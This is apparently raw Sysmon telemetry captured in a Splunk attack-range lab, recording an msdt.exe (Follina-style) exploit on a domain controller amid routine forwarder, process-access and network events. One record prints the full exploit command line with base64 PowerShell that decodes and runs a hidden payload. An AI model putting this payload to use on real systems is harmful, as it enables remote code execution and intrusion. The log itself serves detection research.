13:04:14.749{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098965Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-A43E-6294-D800-000000005502}28845852C:\Windows\system32\csrss.exe{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098964Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-AAC7-6294-6108-000000005502}54885948C:\Windows\system32\cmd.exe{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000098963Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.728{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exe10.0.14393.0 (rs1_release.160715-1616)Diagnostics Troubleshooting WizardMicrosoft® Windows® Operating SystemMicrosoft Corporationmsdt.exe"C:\WINDOWS\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"C:\Program Files\ansible\sysmon\ATTACKRANGE\Administrator{326FD73D-A440-6294-2753-0E0000000000}0xe53272HighMD5=BB98CE2BD520AC69CB3D2F830974CABE,SHA256=C1237BDD2B574C1CBBB4A0D990773BBED5B6FE3BD14F8011C0E79F9CDDCA2B4E,IMPHASH=5D314604CE5F7FF83060B18832AA0D35{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\Program Files\ansible\sysmon" 23542300x800000000000000098962Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.327{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=341B2686C69B4591C147E7E845A921B8,SHA256=2D76EBE02AC3C8D44DFEFD97D85F5106D078790D62D7C4BE985B1DD322E11069,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098961Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:09.973{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53323-false10.0.1.12-8000- 23542300x800000000000000099040Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:15.812{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6D031D68C5FA58D45466C0FFCB678D1,SHA256=4459592C13BD4D906EFF146C335E336F053A2EC3D584E708148D3B1EC9187D69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099039Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:15.437{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C79FC833862AB37BBCE1E5B2BD3633DD,SHA256=771257A071666F98D62C53C248C37E170D8C6A57A3C13DC9BC0EEF25CE00EB54,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099038Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:15.108{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E3EDD44AC522762B7897086BB65F10D,SHA256=3B27229DBCA24AF4E33798921DDFD14D9BAB6EFE5DE7F3C974D9237313C9538F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000099037Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:15.077{326FD73D-A254-6294-1600-000000005502}13002888C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099036Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:15.077{326FD73D-A254-6294-1600-000000005502}13002888C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000099041Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:16.530{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49301D43F2698C801E2369DA507A81D7,SHA256=3C30EE31BEB276320942C6756906CEAB723CE74844001CA1724A06D8157F4EBA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099043Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:17.905{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=6F560645A6E73AD19B5888635695F727,SHA256=D97C6B0BA5C79034AF637AC0DD35ABE5F8C0D0F8706A9F892F0144FF1F1E7853,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099042Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:17.624{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F668DB39B96508FCDDE7F30E4D05431,SHA256=7D3A0A3FE426124908DE777ECB25358231EB7D0748E0CA4C48865FAFB6D0B07C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099053Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:18.718{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C515B1B2151D3C3F76E59304E9A0CE6,SHA256=1831D6A7F382151F2E1BD660E19C799257198D0FACBE3C05072DB2B6DE589225,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000099052Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:18.265{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\msxml6.dll6.30.14393.5006MSXML 6.0Microsoft XML Core ServicesMicrosoft CorporationMSXML6.dllMD5=713974F49A72B2239989F2C671747CC0,SHA256=52333BF669EBBFFD2E3169AC2F718D4A106A87D73DE74C07E7E824651FDDAFA7,IMPHASH=FCAD6732873DA041FB25E83E799A2652trueMicrosoft WindowsValid 734700x800000000000000099051Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:18.249{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2,IMPHASH=0BE8D1F061DD646F6D2B834CB7C9C900trueMicrosoft WindowsValid 10341000x800000000000000099050Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:18.249{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+eb6a5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099049Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:18.249{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+eb5be|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099048Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:18.249{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+eb587|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099047Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:18.233{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+ebd30|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099046Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:18.233{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+81330|C:\Windows\System32\SHELL32.dll+ebcec|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099045Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:18.233{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+ebcc0|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099044Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:18.233{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+ffe59|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000099055Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:19.812{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22AC1A217E8F5A1B5CDC6733E341D89F,SHA256=6EF638259F93C22DCDAEF9356C96C5C38765103117D64234E2F20BDFD1A25FCC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099054Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:19.077{326FD73D-A254-6294-1100-000000005502}104NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=FB584B759A38FF6A5006D06BB857B84D,SHA256=E4634662723EB9C27978AD15B6C191C08A181646C73AEF90229B581B47E70E54,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099057Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:20.905{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD353099F63A1FB843E34FF676D24BAF,SHA256=54C6A4C674A368AC5AAE3FBBCD8BBB6A1E916D8999175FB9B06A023A23BB1B7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099056Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:15.989{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53324-false10.0.1.12-8000- 23542300x800000000000000099058Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:21.999{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9423F6BEFA7258BF85E87967A7EB931,SHA256=435E01146BB113317B9E2A08939EADE4ACF2993F1C03596443CBB5752676D5C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099060Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:23.655{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B815FDBF3105A0143C61AE82F95AAF1E,SHA256=95D93950BC72E3B7DDB3127D4556C8DC830B74A59CF059DD284FB46B71551B09,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099059Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:23.093{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=862BCADAF82A663AA9922153539D8958,SHA256=76789CC58DA9807FB2E7035908C114298BA55D7B084E32D35FB28FE0F19F9F70,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000099062Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:24.593{326FD73D-A253-6294-0B00-000000005502}632844C:\Windows\system32\lsass.exe{326FD73D-A251-6294-0100-000000005502}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97302|C:\Windows\system32\kerberos.DLL+79744|C:\Windows\system32\kerberos.DLL+1444f|C:\Windows\system32\lsasrv.dll+2f1c1|C:\Windows\system32\lsasrv.dll+2d0a6|C:\Windows\system32\lsasrv.dll+328e9|C:\Windows\system32\lsasrv.dll+30237|C:\Windows\system32\lsasrv.dll+2f1c1|C:\Windows\system32\lsasrv.dll+174fd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e 23542300x800000000000000099061Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:24.186{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B877930BB23769BED36C46900D0D7228,SHA256=313EEF4D7FC34FAA834A4CC0267862B3121DD893D573082C4AE671BAC2C63BD2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099066Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:25.655{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=705E654BDBBF1E448922F9317FACD967,SHA256=6D880F130223519D40BEA6D9D096AF16B27626FEB9D283CA2537B8F53621C36C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099065Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:21.551{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53326-false10.0.1.12-8089- 354300x800000000000000099064Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:21.036{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53325-false10.0.1.12-8000- 23542300x800000000000000099063Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:25.280{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E28B19A708CAAE43140A646335DFDDB,SHA256=DB14BEB2FAA872A024F7A06B10F96B8B50760AE4037CF8997301CCD8B24582E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099069Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:22.505{326FD73D-A251-6294-0100-000000005502}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53327-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local445microsoft-ds 354300x800000000000000099068Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:22.505{326FD73D-A251-6294-0100-000000005502}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53327-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local445microsoft-ds 23542300x800000000000000099067Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:26.374{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3D41C51DE4098140FA81588C1B4AF12,SHA256=4908D141283F04A979A4A48E5F1A7FBA23E7A86FDA71A14939CC0091181446F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099070Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:27.468{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 